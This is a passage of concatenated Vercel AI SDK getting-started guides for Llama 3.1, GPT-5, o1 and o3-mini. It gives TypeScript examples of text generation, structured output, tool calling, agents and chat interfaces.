prompt: 'What is love?',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. Prefer to use Amazon Bedrock? The unified interface also means that you can easily switch between models by changing just two lines of code.
import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';
const { text } = await generateText({
model: bedrock('meta.llama3-1-405b-instruct-v1:0'),
prompt: 'What is love?',
});
Streaming the Response
To stream the model's response as it's being generated, update your code snippet to use the streamText function.
import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { textStream } = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

// Consume the stream as chunks arrive
for await (const textPart of textStream) {
  process.stdout.write(textPart);
}
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { object } = await generateObject({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, including generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and Llama 3.1:
import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.
Agents
Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.
Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.
Implementing Agents with the AI SDK
The AI SDK supports agent implementation through the stopWhen parameter (for example, stepCountIs). This allows the model to make multiple decisions and tool calls in a single interaction.
Here's an example of an agent that solves math problems:
import { generateText, stepCountIs, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';
const problem =
'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';
const { text: answer } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
system:
'You are solving math problems. Reason step by step. Use the calculator when necessary.',
prompt: problem,
tools: {
calculate: tool({
description: 'A tool for evaluating mathematical expressions.',
inputSchema: z.object({ expression: z.string() }),
execute: async ({ expression }) => mathjs.evaluate(expression),
}),
},
stopWhen: stepCountIs(5),
});
In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):
import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then streamed back in real-time and displayed in the chat UI.
This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Going Beyond Text
The AI SDK's React Server Components (RSC) API enables you to create rich, interactive interfaces that go beyond simple text generation. With the streamUI function, you can dynamically stream React components from the server to the client.
Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).
First, create a Server Action.
'use server';
import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
export async function streamComponent() {
const result = await streamUI({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Get the weather for San Francisco',
text: ({ content }) => <div>{content}</div>,
tools: {
getWeather: {
description: 'Get the weather for a location',
inputSchema: z.object({ location: z.string() }),
generate: async function* ({ location }) {
yield <div>loading...</div>;
const weather = '25c'; // await getWeather(location);
return (
<div>
the weather in {location} is {weather}.
</div>
);
},
},
},
});
return result.value;
}
In this example, if the model decides to use the getWeather tool, it will first yield a div while fetching the weather data, then return a weather component with the fetched data (note: static data in this example). This allows for a more dynamic and responsive UI that can adapt based on the AI's decisions and external data.
On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.
'use client';
import { useState } from 'react';
import { streamComponent } from './actions';
export default function Page() {
const [component, setComponent] = useState<React.ReactNode>();
return (
<div>
<form
onSubmit={async e => {
e.preventDefault();
setComponent(await streamComponent());
}}
>
<button>Stream Component</button>
</form>
<div>{component}</div>
</div>
);
}
To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.
Migrate from OpenAI
One of the key advantages of the AI SDK is its unified API, which makes it incredibly easy to switch between different AI models and providers. This flexibility is particularly useful when you want to migrate from one model to another, such as moving from OpenAI's GPT models to Meta's Llama models hosted on DeepInfra.
Here's how simple the migration process can be:
OpenAI Example:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-4.1'),
prompt: 'What is love?',
});
Llama on DeepInfra Example:
import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'What is love?',
});
Thanks to the unified API, the core structure of the code remains the same. The main differences are:
- Creating a DeepInfra client
- Changing the model name from openai('gpt-4.1') to deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct').
With just these few changes, you've migrated from OpenAI's GPT-4.1 to Meta's Llama 3.1 hosted on DeepInfra. The generateText function and its usage remain identical, showcasing the power of the AI SDK's unified API.
This feature allows you to easily experiment with different models, compare their performance, and choose the best one for your specific use case without having to rewrite large portions of your codebase.
Prompt Engineering and Fine-tuning
While the Llama 3.1 family of models is powerful out of the box, its performance can be enhanced through effective prompt engineering and fine-tuning techniques.
Prompt Engineering
Prompt engineering is the practice of crafting input prompts to elicit desired outputs from language models. It involves structuring and phrasing prompts in ways that guide the model towards producing more accurate, relevant, and coherent responses.
For more information on prompt engineering techniques (specific to Llama models), check out these resources:
Fine-tuning
Fine-tuning involves further training a pre-trained model on a specific dataset or task to customize its performance for particular use cases. This process allows you to adapt Llama 3.1 to your specific domain or application, potentially improving its accuracy and relevance for your needs.
To learn more about fine-tuning Llama models, check out these resources:
- Official Fine-tuning Llama Guide
- Fine-tuning and Inference with Llama 3
- Fine-tuning Models with Fireworks AI
- Fine-tuning Llama with Modal
Conclusion
The AI SDK offers a powerful and flexible way to integrate cutting-edge AI models like Llama 3.1 into your applications. With AI SDK Core, you can seamlessly switch between different AI models and providers by changing just two lines of code. This flexibility allows for quick experimentation and adaptation, reducing the time required to change models from days to minutes.
The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: Get started with GPT-5
description: Get started with GPT-5 using the AI SDK.
tags: ['getting-started']
---
Get started with OpenAI GPT-5
With the release of OpenAI's GPT-5 model, there has never been a better time to start building AI applications with advanced capabilities like verbosity control, web search, and native multi-modal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI GPT-5
OpenAI's GPT-5 represents their latest advancement in language models, offering powerful new features including verbosity control for tailored response lengths, integrated web search capabilities, reasoning summaries for transparency, and native support for text, images, audio, and PDFs. The model is available in three variants: gpt-5, gpt-5-mini for faster, more cost-effective processing, and gpt-5-nano for ultra-efficient operations.
Prompt Engineering for GPT-5
Here are the key strategies for effective prompting:
Core Principles
- Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
- Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
- Natural language works best: While being precise, write prompts as you would explain to a skilled colleague.
Prompting Techniques
1. Agentic Workflow Control
- Adjust the reasoningEffort parameter to calibrate model autonomy
- Set clear stop conditions and define explicit tool call budgets
- Provide guidance on exploration depth and persistence
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Example with reasoning effort control
const result = await generateText({
model: openai('gpt-5'),
prompt: 'Analyze this complex dataset and provide insights.',
providerOptions: {
openai: {
reasoningEffort: 'high', // Increases autonomous exploration
},
},
});
2. Structured Prompt Format

Use XML-like tags to organize your prompts:
<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>
<task>
Analyze the attached financial report and identify the most important metrics.
</task>
3. Tool Calling Best Practices
- Use tool preambles to provide clear upfront plans
- Define safe vs. unsafe actions for different tools
- Create structured updates about tool call progress
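A minimal sketch of these practices (the system prompt wording and the listFiles tool are illustrative, not part of any API):
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
  model: openai('gpt-5'),
  // Tool preamble: ask the model to state a plan up front and treat
  // destructive actions as unsafe
  system:
    'Before calling a tool, state your plan in one sentence. ' +
    'Treat any destructive action as unsafe and ask for confirmation first.',
  prompt: 'What temporary files are in /tmp?',
  tools: {
    listFiles: tool({
      description: 'Safe, read-only: list files in a directory.',
      inputSchema: z.object({ path: z.string() }),
      // Stubbed result for the sketch
      execute: async ({ path }) => ({ path, files: ['a.tmp', 'b.tmp'] }),
    }),
  },
});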
4. Verbosity Control
- Use the textVerbosity parameter to control response length programmatically
- Override with natural language when needed for specific contexts
- Balance between conciseness and completeness
5. Optimization Workflow
- Start with a clear, simple prompt
- Test and identify areas of ambiguity or confusion
- Iteratively refine by removing contradictions
- Consider using OpenAI's Prompt Optimizer tool for complex prompts
- Document successful patterns for reuse
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('gpt-5'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Verbosity Control
One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Concise response
const { text: conciseText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'low', // Produces terse, minimal responses
},
},
});
// Detailed response
const { text: detailedText } = await generateText({
model: openai('gpt-5'),
prompt: 'Explain quantum computing.',
providerOptions: {
openai: {
textVerbosity: 'high', // Produces comprehensive, detailed responses
},
},
});
Web Search
GPT-5 can access real-time information through the integrated web search tool:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-5'),
prompt: 'What are the latest developments in AI this week?',
tools: {
web_search: openai.tools.webSearch({
searchContextSize: 'high',
}),
},
});
// Access URL sources
const sources = result.sources;
Reasoning Summaries
For transparency into GPT-5's thought process, enable reasoning summaries:
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai.responses('gpt-5'),
prompt:
'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
},
},
});
// Stream reasoning and text separately
for await (const part of result.fullStream) {
if (part.type === 'reasoning-delta') {
console.log(part.text);
} else if (part.type === 'text-delta') {
process.stdout.write(part.text);
}
}
Using Tools with the AI SDK
GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { toolResults } = await generateText({
model: openai('gpt-5'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
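For example, with pnpm:
pnpm add ai @ai-sdk/openai @ai-sdk/react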
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('gpt-5'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({});
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: Get started with OpenAI o1
description: Get started with OpenAI o1 using the AI SDK.
tags: ['getting-started', 'reasoning']
---
Get started with OpenAI o1
With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o1
OpenAI released a series of AI models designed to spend more time thinking before responding. They can reason through complex tasks and solve harder problems than previous models in science, coding, and math. These models, named the o1 series, are trained with reinforcement learning and can "think before they answer". As a result, they are able to produce a long internal chain of thought before responding to a prompt.
The main reasoning model available in the API is:
- o1: Designed to reason about hard problems using broad general knowledge about the world.
| Model | Streaming | Tools | Object Generation | Reasoning Effort |
| --- | --- | --- | --- | --- |
| o1 | ✓ | ✓ | ✓ | ✓ |
Benchmarks
OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:
- Ranking in the 89th percentile on competitive programming questions (Codeforces)
- Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
- Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)
Prompt Engineering for o1 Models
The o1 models perform best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately (see the example after this list).
- Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.
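For example, applying the delimiter guidance above (the tag names and report content are illustrative):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// XML-like tags mark distinct parts of the input
const { text } = await generateText({
  model: openai('o1'),
  prompt: [
    '<instructions>Summarize the report in one paragraph.</instructions>',
    '<report>Quarterly revenue grew 12% while costs held flat.</report>',
  ].join('\n'),
});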
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain the concept of quantum entanglement.',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. The unified interface also means that you can easily switch between models by changing just one line of code. For example, to use o1-mini:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
  model: openai('o1-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o1 through the reasoningEffort parameter.
This parameter can be set to 'low', 'medium', or 'high' to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o1'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('o1'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Structured object generation is supported with o1.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, like generateText and streamText. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and o1:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o1'),
prompt: 'What is the weather like today?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Tools are compatible with o1.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o1'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for the o1 series of reasoning models in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: Get started with OpenAI o3-mini
description: Get started with OpenAI o3-mini using the AI SDK.
tags: ['getting-started', 'reasoning']
---
Get started with OpenAI o3-mini
With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI o3-mini alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI o3-mini
OpenAI recently released a new AI model optimized for STEM reasoning that excels in science, math, and coding tasks. o3-mini matches o1's performance in these domains while delivering faster responses and lower costs. The model supports tool calling, structured outputs, and system messages, making it a great option for a wide range of applications.
o3-mini offers three reasoning effort levels:
- Low: Optimized for speed while maintaining solid reasoning capabilities
- Medium: Balanced approach matching o1's performance levels
- High: Enhanced reasoning power exceeding o1 in many STEM domains
| Model | Streaming | Tool Calling | Structured Output | Reasoning Effort | Image Input |
| --- | --- | --- | --- | --- | --- |
| o3-mini | ✓ | ✓ | ✓ | ✓ | ✗ |
Benchmarks
OpenAI o3-mini demonstrates impressive performance across technical domains:
- 87.3% accuracy on AIME competition math questions
- 79.7% accuracy on PhD-level science questions (GPQA Diamond)
- 2130 Elo rating on competitive programming (Codeforces)
- 49.3% accuracy on verified software engineering tasks (SWE-bench)
These benchmark results were achieved using the high reasoning effort setting.
Prompt Engineering for o3-mini
The o3-mini model performs best with straightforward prompts. Some prompt engineering techniques, like few-shot prompting or instructing the model to "think step by step," may not enhance performance and can sometimes hinder it. Here are some best practices:
- Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
- Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
- Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain the concept of quantum entanglement.',
});
Refining Reasoning Effort
You can control the amount of reasoning effort expended by o3-mini through the reasoningEffort parameter.
This parameter can be set to low, medium, or high to adjust how much time and computation the model spends on internal reasoning before producing a response.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Reduce reasoning effort for faster responses
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'Explain quantum entanglement briefly.',
providerOptions: {
openai: { reasoningEffort: 'low' },
},
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai('o3-mini'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
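For example, with pnpm:
pnpm add ai @ai-sdk/openai @ai-sdk/react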
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
